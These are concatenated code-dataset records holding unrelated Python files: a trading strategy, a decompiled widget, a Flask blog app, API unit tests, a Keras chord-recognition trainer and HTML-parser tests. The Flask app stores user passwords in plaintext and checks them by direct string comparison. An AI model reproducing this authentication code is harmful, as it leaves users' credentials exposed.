self.cursor.fetchone()[0]\n","sub_path":"tgficbot/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"317766797","text":"from .portfolio_base import PortfolioBase\nfrom ...signals import pyti_macd_signal\n\n\n# custom param, default\n# 'short_window', 12\n# 'long_window', 26\n# 'signal_window', 9\nclass Macd(PortfolioBase):\n\n def __init__(self, default, limits, custom, portfolio, portfolio_id=None, strategy_id=None):\n super().__init__(default, limits, portfolio, portfolio_id, strategy_id)\n self.signal = pyti_macd_signal.PytiMacdSignal(\n self.market,\n self.interval,\n custom,\n self\n )\n\n def on_data(self, candle):\n action = self.signal.check_condition(candle)\n if self.get_open_position_count() >= self.position_limit and action == 'buy':\n action = 'hold'\n self.execute(\n self.order_quantity,\n self.fixed_stoploss_percentage,\n self.trailing_stoploss_percentage,\n self.profit_target_percentage,\n action\n )\n","sub_path":"kryptobot/strategies/t2/macd.py","file_name":"macd.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"320400711","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/ztfy/sendit/skin/packet/widget.py\n# Compiled at: 2013-05-31 13:02:11\nfrom ztfy.security.browser.widget.interfaces import IPrincipalListWidget\nfrom ztfy.sendit.app.interfaces import ISenditApplication\nfrom ztfy.sendit.profile.interfaces import IProfile\nfrom z3c.form.widget import FieldWidget\nfrom ztfy.security.browser.widget.principal import PrincipalListWidget\nfrom ztfy.utils.traversing import getParent\n\nclass IPacketRecipientsWidget(IPrincipalListWidget):\n \"\"\"Packet recipients widget interface\"\"\"\n\n def canRegisterUser(self):\n \"\"\"Check if user can register new external users\"\"\"\n pass\n\n\nclass PacketRecipientsWidget(PrincipalListWidget):\n \"\"\"Packet recipients widget\"\"\"\n query_name = 'findFilteredPrincipals'\n registration_view_name = 'register_user.html'\n\n def canRegisterUser(self):\n profile = IProfile(self.request.principal)\n name, _plugin, _info = profile.getAuthenticatorPlugin()\n if name is None:\n return False\n else:\n app = getParent(self.context, ISenditApplication)\n return app is not None and name in app.internal_auth_plugins\n\n\ndef PacketRecipientsWidgetFactory(field, request):\n return FieldWidget(field, PacketRecipientsWidget(request))","sub_path":"pycfiles/ztfy.sendit-0.1.20-py2.7/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"107984279","text":"# coding=UTF-8\nfrom datetime import datetime\nfrom flask import render_template, flash, redirect, url_for, request\nfrom flask_login import login_user, logout_user, current_user\nfrom app import app, db, lm\n\nfrom app.models.tables import User, Comentario, Texto\nfrom app.models.forms import LoginForm, RegisterComentario, RegisterPost\n\n@lm.user_loader\ndef load_user(id):\n\treturn User.query.filter_by(id=id).first()\n\n@app.route(\"/index\")\n@app.route(\"/\")\ndef index():\n\treturn render_template('index.html')\n\n@app.route(\"/login\", methods=[\"GET\",\"POST\"])\ndef login():\n\tform = LoginForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=form.username.data).first()\n\t\tif user and user.password == form.password.data:\n\t\t\tlogin_user(user)\n\t\t\tflash(\"Logged in\")\n\t\t\treturn redirect(url_for(\"timeline\"))\n\t\telse:\n\t\t\tflash(\"Invalid login\")\n\treturn render_template('login.html',\n\t\t form=form)\n\n@app.route(\"/logout\")\ndef logout():\n\tlogout_user()\n\tflash(\"Logged out\")\n\treturn redirect(url_for(\"index\"))\n\n@app.route(\"/cadastrar\")\ndef cadastrar():\n\treturn render_template(\"cadastro.html\")\n\n@app.route(\"/cadastro\", methods=['GET', 'POST'])\ndef cadastro():\n\tif request.method == \"POST\":\n\t\tusername = request.form.get(\"username\")\n\t\tpassword = request.form.get(\"password\")\n\t\tname = request.form.get(\"name\")\n\t\temail = request.form.get(\"email\")\n\n\t\tif username and password and name and email:\n\t\t\tp = User(username, password, name, email)\n\t\t\tdb.session.add(p)\n\t\t\tdb.session.commit()\n\n\treturn redirect(url_for(\"cadastrado\"))\n\n@app.route(\"/cadastrado\")\ndef cadastrado():\n\treturn render_template(\"cadastrado.html\")\n\n@app.route(\"/publicar\")\ndef publicar():\n\tform = RegisterPost()\n\treturn render_template(\"publicarPost.html\", form=form)\n\n@app.route(\"/publicacoes\", methods=['GET', 'POST'])\ndef publicacoes():\n\tform = RegisterPost()\n\taul = current_user.username\n\tif request.method == \"POST\":\n\t\ttitulo = request.form.get(\"titulo\")\n\t\ttexto = request.form.get(\"texto\")\n\t\tcoautores = request.form.get(\"coautores\")\n\t\tdescricao = request.form.get(\"descricao\")\n\t\tautor = aul\n\n\t\tif titulo and texto and coautores and descricao and autor:\n\t\t\ti = Texto(titulo, texto, coautores, descricao, autor)\n\t\t\tdb.session.add(i)\n\t\t\tdb.session.commit()\n\t\t#return \"

Novo texto publicado!!!

\" \n\n\treturn redirect(url_for(\"publicado\"))\n\t\n@app.route(\"/publicado\")\ndef publicado():\n\treturn render_template(\"publicado.html\")\n\n@app.route(\"/timeline\")\ndef timeline():\n\ttexto = Texto.query.all()\n\t#idusuario = current_user.id\n\t#texto = Texto.query.filter_by(autor=idusuario)\n\treturn render_template('timeline.html', texto=texto)\n\n@app.route(\"/textoCompleto/\", methods=['GET','POST'])\ndef textocompleto(id):\t\n\ttextt = Texto.query.get(id)\n\t#user = User.query.get(textt.autor)\n\n\ttitulo=textt.titulo\n\t#autores= \"autor: \" + user.username + \", coautores: \" + textt.coautores \n\tdescricao= textt.descricao\n\ttexto= textt.texto\n\n\tform = RegisterComentario()\n\tcomentario = Comentario.query.all()\n\t#comentario = Comentario.query.filter_by(post_id=id)\n\n\n\t#if form.validate_on_submit():\n\t\t#new_Comentario = Comentario( post_id=id, comentario=form.comentario.data )\n\t\t#db.session.add(new_Comentario)\n\t\t#db.session.commit()\n\t\t\n\n\tif request.method == \"POST\":\n\t\tpost_id = id\n\t\tcomentario = request.form.get(\"comentario\")\n\t\t\n\t\tif post_id and comentario :\n\t\t\tq = Comentario(post_id, comentario)\n\t\t\tdb.session.add(q)\n\t\t\tdb.session.commit()\n\t\t\treturn \"

Comentário adicionado!

\"\n\n\treturn render_template(\"textoCompleto.html\", titulo=titulo, texto=texto, descricao=descricao, id=id, form=form, comentario=comentario)\n\n\n\n\n\n\n\n","sub_path":"app/controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"279984630","text":"#!/usr/bin/python2\n# -*- coding: utf-8 -*-\n# @Author : Li ZiHao\n# @Time : 2019/9/19 11:35\n# @File : method_test.py\n\nimport time\nimport unittest\nfrom test_programe.interface.base.base_demo import RunMain\nimport random\nfrom HTMLTestRunner import HTMLTestRunner\n\n\n'''\nclass TestMethod(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print(\"类执行之前会打印,且只打印一次\")\n\n @classmethod\n def tearDownClass(cls):\n print(\"类执行后会打印,且只打印一次\")\n\n def setUp(self):\n print(\"每个case执行前都会执行一次\")\n\n def tearDown(self):\n print(\"每个case执行后都会执行一次\")\n\n def test_01(self):\n print('第一个case!!')\n\n def test_02(self):\n print('第二个case!!')\n'''\n\n\nclass TestMethod(unittest.TestCase):\n username = ''\n password = random.randint(1, 3)\n\n def setUp(self):\n self.run = RunMain()\n\n def test_01(self):\n url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n data = {\n 'cart': '11'\n }\n res = self.run.run_main(url, 'POST', data)\n self.assertEqual(res['data']['errorCode'], 1006)\n globals()['code'] = res['code']\n print(\"这是我的第一个case!!\")\n\n # @unittest.skip('skip test_02 because cart is null')\n def test_02(self):\n url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n data = {\n 'cart': ''\n }\n res = self.run.run_main(url,'GET',data)\n self.assertEqual(res['data']['errorCode'], 1006)\n self.assertEqual(res['code'], code)\n print(\"这是我的第二个case!!\")\n\n @unittest.skipIf(username == '', 'skip test_03 if username is null ')\n def test_03(self):\n url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n data = {\n 'cart': ''\n }\n res = self.run.run_main(url, 'GET', data)\n self.assertEqual(res['data']['errorCode'], 1006)\n print(\"这是我的第三个case!!\")\n\n @unittest.skipUnless(password == 2, 'skip test_04 unless password == 2')\n def test_04(self):\n url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n data = {\n 'cart': ''\n }\n res = self.run.run_main(url, 'GET', data)\n self.assertEqual(res['data']['errorCode'], 1006)\n print(\"这是我的第四个case!!\")\n\n @unittest.expectedFailure\n def test_05(self):\n url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n data = {\n 'cart': '11'\n }\n res = self.run.run_main(url, 'POST', data)\n self.assertEqual(res['code'], 300)\n print('这是我的第五个case')\n\n\nif __name__ == '__main__':\n test_dir = './'\n discover = unittest.defaultTestLoader.discover(\n test_dir,\n pattern='*_test.py'\n )\n now_time = time.strftime('%Y-%m-%d %H_%M_%S')\n report_file = '../report/'+ now_time + '_report.html'\n with open(report_file, 'wb') as fp:\n runner = HTMLTestRunner(\n stream=fp,\n title='TestMethod Report',\n description='This is a test report哈哈'\n )\n runner.run(discover)\n\n\n\n\n","sub_path":"test_programe/interface/case/method_test.py","file_name":"method_test.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"82479166","text":"''' Libraries '''\nimport os\nimport sys\nimport time\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping\n\nfrom score import get_sevenths_score\nfrom mapping import mapping_dict, short_mapping_dict\n\n\n''' Parameters '''\nRAMDON_SEED = 2\n\n\n''' Global variables'''\ndebug_mode = False\nif debug_mode:\n data_directory = 'CE200_sample'\n file_amount = 20\nelse:\n data_directory = 'CE200'\n file_amount = 200\n\ndata_divide_amount = 1\nsec_per_frame = 512.0 / 22050.0 / data_divide_amount\n\nframes_per_data = data_divide_amount * 11\nframes_on_one_side = int((frames_per_data - 1) / 2)\n\nepochs = 30000\nbatch_size = 87075\n\nload_exist_model = False\nload_model_path = 'model/2020-10-28/20.57.14'\n\ndisplay_figure = False\n\nauto_save_path = True\nif auto_save_path:\n now = time.localtime()\n now_date = time.strftime('%Y-%m-%d', now)\n now_time = time.strftime('%H.%M.%S', now)\n save_directory = f'model/{now_date}/{now_time}'\nelse:\n save_directory = ''\n\noutput_answer = True\n\n\n''' Codes '''\ndef adjust_model(model):\n model.add(Dense(400, input_shape=(264, ), activation='relu'))\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 1\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 2\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 3\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 4\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 5\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 6\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 7\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 8\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 9\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 10\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 11\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 12\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 13\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 14\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 15\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 16\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 17\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 18\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 19\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 20\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 21\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 22\n model.add(Dense(400, input_shape=(400, ), activation='sigmoid')) # 23\n model.add(Dense(400, input_shape=(400, ), activation='relu')) # 24\n model.add(Dense(544, input_shape=(400, ), activation='softmax'))\n model.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n return model\n\n\ndef processData(train_file_index):\n ''' Dataset '''\n X = []\n X_train = []\n X_validation = []\n Y = []\n Y_train = []\n Y_validation = []\n\n error_list = []\n\n toolbar_width = 100\n sys.stdout.write(\"\\nReading train & validation datas from each songs in '%s'.\\n[%s]\" % (data_directory, \" \" * toolbar_width))\n sys.stdout.flush()\n sys.stdout.write(\"\\b\" * (toolbar_width+1))\n\n for song_index in range(file_amount):\n\n if data_divide_amount == 1: read_csv_file_path = f'{data_directory}/{song_index+1}/data.csv'\n else: read_csv_file_path = f'{data_directory}/{song_index+1}/data_divide_{data_divide_amount}.csv'\n \n data = pd.read_csv(read_csv_file_path, index_col=0)\n\n data['label'] = data['label'].map(mapping_dict)\n # for index, label in enumerate(data['label']):\n # if label in short_mapping_dict.keys(): data['label'][index] = short_mapping_dict[label]\n # else: data['label'][index] = short_mapping_dict['Other']\n\n data = data.values\n\n label_index = data.shape[1]-1\n data_index = np.arange(len(data))\n np.random.shuffle(data_index)\n data_index = data_index[:int(len(data_index) * 1)]\n data = np.vstack((np.zeros((frames_on_one_side, 25)), data, np.zeros((frames_on_one_side, 25))))\n\n for index, shuffle_index in enumerate(data_index):\n try:\n label = int(data[index+frames_on_one_side, label_index])\n shuffle_label = int(data[shuffle_index+frames_on_one_side, label_index])\n X.append(data[index:index+frames_per_data, 0:label_index].reshape(label_index*frames_per_data))\n Y.append(label)\n if song_index in train_file_index:\n X_train.append(data[shuffle_index:shuffle_index+frames_per_data, 0:label_index].reshape(label_index*frames_per_data))\n Y_train.append(shuffle_label)\n else:\n X_validation.append(data[shuffle_index:shuffle_index+frames_per_data, 0:label_index].reshape(label_index*frames_per_data))\n Y_validation.append(shuffle_label)\n except:\n error_list.append({\n 'index': index+frames_on_one_side,\n 'label string': data[index+frames_on_one_side, label_index],\n 'shuffle_index': shuffle_index+frames_on_one_side,\n 'shuffle_label string': data[shuffle_index+frames_on_one_side, label_index]\n })\n continue\n\n if debug_mode:\n sys.stdout.write(\"=\" * 5)\n sys.stdout.flush()\n elif (song_index + 1) % (file_amount / toolbar_width) == 0:\n sys.stdout.write(\"=\")\n sys.stdout.flush()\n\n sys.stdout.write(\"]\\n\\n\")\n\n X = np.array(X)\n X_train = np.array(X_train)\n X_validation = np.array(X_validation)\n Y = to_categorical(Y, num_classes=len(mapping_dict))\n Y_train = to_categorical(Y_train, num_classes=len(mapping_dict))\n Y_validation = to_categorical(Y_validation, num_classes=len(mapping_dict))\n \n print('Error amount: ', len(error_list))\n print(f'Train data: {int(len(X_train)):7d} / All data: {len(X):7d}\\n')\n time.sleep(3)\n\n return (X, Y), (X_train, Y_train), (X_validation, Y_validation)\n\n\ndef compare_figure(history):\n \n import matplotlib.pyplot as plt\n \n loss = history.history['loss']\n accuracy = history.history['accuracy']\n validation_loss = history.history['val_loss']\n validation_accuracy = history.history['val_accuracy']\n epochs_length = range(1, len(loss)+1)\n\n fig, axs = plt.subplots(2)\n fig.set_size_inches(12, 16) # 3:4\n fig.suptitle('Training & Validation Comparition')\n # plt.title('Training & Validation Loss')\n # plt.xlabel('Epochs')\n # plt.ylabel('Loss')\n axs[0].plot(epochs_length, loss, \"b-\", label='Training Loss')\n axs[0].plot(epochs_length, validation_loss, \"r-\", label='Validation Loss')\n axs[1].plot(epochs_length, accuracy, \"b-\", label='Training Accuracy')\n axs[1].plot(epochs_length, validation_accuracy, \"r-\", label='Validation Accuracy')\n axs[0].legend()\n axs[1].legend()\n\n plt.savefig(f'{save_directory}/figure.png', dpi=200)\n if display_figure: plt.show()\n\n return\n\n\ndef estimate_and_write_to_file(model):\n\n toolbar_width = 100\n sys.stdout.write(f\"\\nEstimating and write to '{data_directory}/xxx/est_file.txt'.\\n[%s]\" % (\" \" * toolbar_width))\n sys.stdout.flush()\n sys.stdout.write(\"\\b\" * (toolbar_width+1))\n\n for song_index in range(file_amount):\n\n if data_divide_amount == 1: read_csv_file_path = f'{data_directory}/{song_index+1}/data.csv'\n else: read_csv_file_path = f'{data_directory}/{song_index+1}/data_divide_{data_divide_amount}.csv'\n\n data = pd.read_csv(read_csv_file_path, index_col=0)\n data['label'] = data['label'].map(mapping_dict)\n data = data.values\n\n label_index = data.shape[1]\n original_data_length = len(data)\n data = np.vstack((np.zeros((frames_on_one_side, label_index)), data, np.zeros((frames_on_one_side, label_index))))\n\n X = []\n for i in range(original_data_length):\n X.append(data[i:i+frames_per_data, 0:label_index-1].reshape((label_index-1)*frames_per_data))\n \n X = np.array(X)\n Y_pred = model.predict_classes(X)\n with open(f'{data_directory}/{song_index+1}/est_file.txt', mode='w') as f:\n index_now = 0\n index_last = 0\n while index_now < len(Y_pred):\n if (index_now == len(Y_pred) - 1) or (Y_pred[index_now] != Y_pred[index_now+1]):\n for k, v in mapping_dict.items():\n if v == Y_pred[index_now]:\n f.write(f'{sec_per_frame*index_last:.06f}\\t{sec_per_frame*(index_now+1):.06f}\\t{k}\\n')\n index_last = index_now + 1\n break\n index_now += 1\n\n if debug_mode:\n sys.stdout.write(\"=\" * 5)\n sys.stdout.flush()\n elif (song_index + 1) % (file_amount / toolbar_width) == 0:\n sys.stdout.write(\"=\")\n sys.stdout.flush()\n\n sys.stdout.write(\"]\\n\\n\")\n return\n\n\ndef record_details(cost_time, validation_loss, validation_accuracy, original_loss, original_accuracy, model_scores):\n print(f\"\\nRecording details... \", end='')\n with open(f'{save_directory}/details.txt', mode='w') as f:\n f.write(f'RAMDON_SEED = {RAMDON_SEED}\\n')\n f.write(f'\\n')\n f.write(f'data_divide_amount = {data_divide_amount}\\n')\n f.write(f'frames_per_data = {frames_per_data}\\n')\n f.write(f'\\n')\n f.write(f'epochs = {epochs}\\n')\n f.write(f'batch_size = {batch_size}\\n')\n f.write(f'\\n')\n f.write(f'cost_time: {cost_time}\\n')\n f.write(f'validation_loss: {validation_loss}\\n')\n f.write(f'validation_accuracy: {validation_accuracy}\\n')\n f.write(f'original_loss (all data): {original_loss}\\n')\n f.write(f'original_accuracy (all data): {original_accuracy}\\n')\n f.write(f'\\n')\n for model_name, model_score in model_scores.items():\n f.write(f\"Score by '{model_name}' model: {model_score}\\n\")\n print('Done.')\n return\n\n\ndef main():\n\n np.random.seed(RAMDON_SEED)\n file_index = np.arange(file_amount)\n np.random.shuffle(file_index)\n train_file_index = file_index[:int(file_amount * 0.4)]\n validation_file_index = file_index[int(file_amount * 0.4):]\n\n ''' Model '''\n model = Sequential()\n if load_exist_model:\n\n model_dict = {\n 'last': 'model.h5',\n 'min val_loss': 'best_model_min_val_loss.h5',\n 'max val_accuracy': 'best_model_max_val_accuracy.h5',\n }\n\n for model_name, file_name in model_dict.items():\n\n model = load_model(f'{load_model_path}/{file_name}')\n # (X, Y), (X_train, Y_train), (X_validation, Y_validation) = processData(train_file_index)\n # loss, accuracy = model.evaluate(X, Y)\n # print(f'\\nEvaluate with original data (all) - Loss: {loss}, Accuracy: {accuracy * 100:.3f}%')\n estimate_and_write_to_file(model)\n \n total_score = 0\n train_score = 0\n validation_score = 0\n\n for song_index in file_index:\n ref_file_path = f'{data_directory}/{song_index+1}/ground_truth.txt'\n est_file = f'{data_directory}/{song_index+1}/est_file.txt'\n score = get_sevenths_score(ref_file=ref_file_path, est_file=est_file)\n total_score += score\n if song_index in train_file_index: train_score += score\n else: validation_score += score\n\n total_score /= file_amount\n train_score /= len(train_file_index)\n validation_score /= len(validation_file_index)\n\n print(f\"\\nTotal average score by '{model_name}': {total_score}\")\n print(f\"Train average score by '{model_name}': {train_score}\")\n print(f\"Validation average score by '{model_name}': {validation_score}\")\n\n else:\n\n (X, Y), (X_train, Y_train), (X_validation, Y_validation) = processData(train_file_index)\n\n model = adjust_model(model)\n os.system('cls')\n \n if not os.path.exists(save_directory):\n os.makedirs(save_directory)\n last_model_path = f'{save_directory}/model.h5'\n best_model_min_val_loss_path = f'{save_directory}/best_model_min_val_loss.h5'\n best_model_max_val_accuracy_path = f'{save_directory}/best_model_max_val_accuracy.h5'\n\n rename_save_directory = save_directory\n start_time = datetime.datetime.now() # Set timer\n\n MCP_min_val_loss = ModelCheckpoint(\n best_model_min_val_loss_path,\n monitor='val_loss', mode='min', verbose=1, save_best_only=True\n )\n MCP_max_val_acc = ModelCheckpoint(\n best_model_max_val_accuracy_path,\n monitor='val_accuracy', mode='max', verbose=1, save_best_only=True\n )\n ES = EarlyStopping(\n monitor='loss', mode='min',\n verbose=1, patience=50\n )\n history = model.fit(\n X_train, Y_train, \n # validation_split=validation_split,\n validation_data=(X_validation, Y_validation),\n epochs=epochs, batch_size=batch_size,\n callbacks=[MCP_min_val_loss, MCP_max_val_acc, ES]\n )\n\n end_time = datetime.datetime.now()\n cost_time = str(end_time-start_time)\n\n print(f'\\nLearning cost time: {cost_time}\\n')\n validation_loss, validation_accuracy = model.evaluate(X_validation, Y_validation)\n print(f'Evaluate with validation data - Loss: {validation_loss}, Accuracy: {validation_accuracy * 100:.2f}%\\n')\n original_loss, original_accuracy = model.evaluate(X, Y)\n print(f'Evaluate with original data (all) - Loss: {original_loss}, Accuracy: {original_accuracy * 100:.2f}%')\n \n ''' Save figure & model '''\n if data_divide_amount == 1: rename_save_directory = f'{rename_save_directory}-MF-{original_accuracy * 100:.2f}%'\n else: rename_save_directory = f'{rename_save_directory}-DMF-{original_accuracy * 100:.2f}%'\n \n compare_figure(history)\n model.save(last_model_path)\n\n if output_answer:\n model_paths = {\n 'last': last_model_path,\n 'min val_loss': best_model_min_val_loss_path,\n 'max val_accuracy': best_model_max_val_accuracy_path,\n }\n model_scores = {}\n best_score = 0\n score = 0\n for model_name, model_path in model_paths.items():\n model = Sequential()\n model = load_model(model_path)\n estimate_and_write_to_file(model)\n for song_index in validation_file_index:\n ref_file_path = f'{data_directory}/{song_index+1}/ground_truth.txt'\n est_file = f'{data_directory}/{song_index+1}/est_file.txt'\n score += get_sevenths_score(ref_file=ref_file_path, est_file=est_file)\n score /= len(validation_file_index)\n model_scores[model_name] = score\n if score > best_score: best_score = score\n print(f\"\\nAverage validation score by '{model_name}' model: {score}\")\n rename_save_directory = f'{rename_save_directory}-{best_score * 100:.5f}'\n\n record_details(cost_time, validation_loss, validation_accuracy, original_loss, original_accuracy, model_scores)\n\n os.rename(save_directory, rename_save_directory)\n\n\nif __name__ == \"__main__\":\n os.system('cls')\n main()","sub_path":"phase1_competition/other models/splitDataModel.py","file_name":"splitDataModel.py","file_ext":"py","file_size_in_byte":16165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"621119806","text":"#!/usr/bin/env python3\n\nimport unittest\nfrom bs4 import BeautifulSoup as BSoup\nfrom brings.parser import SoupParser\nfrom brings.scraper import read_sites_config\n\n\nclass TestParser(unittest.TestCase):\n def setUp(self):\n site = \"\"\n with open('local/testsite.html', 'r') as fh:\n site = fh.read()\n self.parser = SoupParser(BSoup(site, 'html5lib'))\n\n broken_site = \"\"\n with open('local/testsite_broken.html', 'r') as fh:\n broken_site = fh.read()\n self.broken_parser = SoupParser(BSoup(broken_site, 'html5lib'))\n\n self.parser.filter_region(('div', {\"id\":\"main\"}))\n self.parser.set_section(('article', {}))\n\n self.broken_parser.filter_region(('div', {\"id\":\"main\"}))\n self.broken_parser.set_section(('article',{}))\n\n def test_must_have(self):\n site = \"\"\n with open ('local/lgs.xml', 'r') as fh:\n site = fh.read()\n parser = SoupParser(BSoup(site, 'xml'))\n parser.set_section(('item',))\n parser.must_have_tag(('rsslink',))\n parser.require_tag_content('title', ('title',))\n parser.parse()\n self.assertEqual(10, len(parser.parsed_data))\n\n def test_must_have_in_seiten_xml(self):\n site = \"\"\n with open ('database/seiten.xml', 'r') as fh:\n site = fh.read()\n parser = SoupParser(BSoup(site, 'xml'))\n parser.set_section(('source', {'name':'Landesverband'}))\n parser.must_have_tag(('scraper_id',), content=\"lgs_pm\")\n parser.require_section_attribute('name', 'name')\n parser.require_tag_content('locale_string', ('locale', {}))\n parser.parse()\n self.assertEqual(1, len(parser.parsed_data))\n self.assertEqual('Landesverband', parser.parsed_data[0]['name'])\n\n def test_want_tag_content(self):\n parser = self.parser\n parser.want_tag_content(\n 'title',\n ('div', {'class':'entry-title'}),\n 'no-title'\n )\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual('Testtitle', parser.parsed_data[0]['title'])\n\n def test_want_tag_content_parent(self):\n parser = self.parser\n parser.want_tag_content(\n 'title',\n ('div', {'class':'entry-title'}),\n 'no-title',\n ('header', {'class':'article-header'})\n )\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual('Testtitle', parser.parsed_data[0]['title'])\n\n def test_want_tag_content_default(self):\n \"\"\"Try to fetch content from a non-existing tag and check for\n default value.\n \"\"\"\n parser = self.parser\n parser.want_tag_content(\n 'title',\n ('div', {'class':'title'}),\n 'no-title'\n )\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n for article in parser.parsed_data:\n self.assertEqual('no-title', article['title'])\n\n def test_want_attribute_parent(self):\n parser = self.parser\n parser.want_attribute(\n 'img_sizes',\n ('img',{'class':'attachment-antwortzeit-thumb-240'}),\n 'sizes',\n '0x0',\n ('div', {'class':'bild'})\n )\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual('(max-width: 240px) 100vw, 240px',\n parser.parsed_data[0]['img_sizes'])\n\n def test_want_attribute_wo_parent(self):\n \"\"\"Fetch the value of an attribute, without filtering through\n a parent tag. This only takes effect in the test-article.\n \"\"\"\n parser = self.parser\n parser.want_attribute(\n 'img_sizes',\n ('img',{'class':'attachment-antwortzeit-thumb-240'}),\n 'sizes',\n '0x0',\n )\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual('test_size',\n parser.parsed_data[0]['img_sizes'])\n self.assertEqual('(max-width: 240px) 100vw, 240px',\n parser.parsed_data[1]['img_sizes'])\n\n def test_want_section_attribute(self):\n parser = self.parser\n parser.want_section_attribute('post-id', 'id', 'no-id')\n parser.parse()\n self.assertEqual(parser.parsed_data[0]['post-id'], 'post-0815')\n\n def test_require_tag_content(self):\n parser = self.parser\n parser.require_tag_content(\n 'title',\n ('div', {'class':'entry-title'}),\n )\n self.assertEqual(1, len(parser.required_rules))\n self.assertEqual('title', parser.required_rules[0][1])\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual('Testtitle', parser.parsed_data[0]['title'])\n\n def test_require_attribute(self):\n parser = self.parser\n parser.require_attribute('url', ('a',), 'href')\n self.assertEqual(1, len(parser.required_rules))\n self.assertEqual('url', parser.required_rules[0][1])\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual(\n 'https://test-article.de',\n parser.parsed_data[0]['url']\n )\n\n def test_require_tag_broken(self):\n parser = self.broken_parser\n parser.require_tag_content(\n 'title',\n ('div', {'class':'entry-title'}),\n )\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n\n def test_require_attribute_broken(self):\n parser = self.broken_parser\n parser.require_attribute('url', ('a', ), 'href')\n parser.want_tag_content('pub_time', ('div', {'class':'meta time'}), \"heute\")\n parser.parse()\n self.assertEqual(2, len(parser.parsed_data[0]))\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual('heute', parser.parsed_data[0]['pub_time'])\n\n def test_parse_a_real_set(self):\n parser = self.parser\n parser.require_tag_content('title', ('div', {'class':'entry-title'}))\n parser.require_attribute('url', ('a', {'class':'nolinkstyle'}), 'href')\n parser.want_tag_content('pub_time', ('div', {'class':'meta time'}, \"heute\"))\n parser.want_attribute('link_title', ('a', {'class':'nolinkstyle'}), 'title', \"---\")\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual(4, len(parser.parsed_data[0]))\n self.assertEqual('Testtitle', parser.parsed_data[0]['title'])\n self.assertEqual('https://test-article.de', parser.parsed_data[0]['url'])\n self.assertEqual('01. Januar 1970', parser.parsed_data[0]['pub_time'])\n\n def test_want_regex(self):\n import re\n parser = self.parser\n parser.want_regex(\n 'monat',\n ('header', {'class':'article-header'}),\n re.compile('oktober', re.I),\n 'nicht im oktober publiziert')\n parser.require_tag_content(\n 'title',\n ('div', {'class':'entry-title'})\n )\n parser.parse()\n self.assertEqual(11, len(parser.parsed_data))\n self.assertEqual('11. Oktober 2019', parser.parsed_data[1]['monat'])\n self.assertEqual('nicht im oktober publiziert', parser.parsed_data[4]['monat'])\n\n def test_add_transform_func(self):\n def transformfunc(infos, article):\n article['title'] = \"We are all the same.\"\n parser = self.parser\n parser.add_transform_func(transformfunc)\n parser.require_tag_content(\n 'title',\n ('div', {'class':'entry-title'})\n )\n parser.parse()\n for article in parser.parsed_data:\n self.assertEqual('We are all the same.', article['title'])\n\n def test_multiple_calls_to_parse(self):\n parser = self.parser\n parser.require_tag_content(\n 'title',\n ('div', {'class':'entry-title'})\n 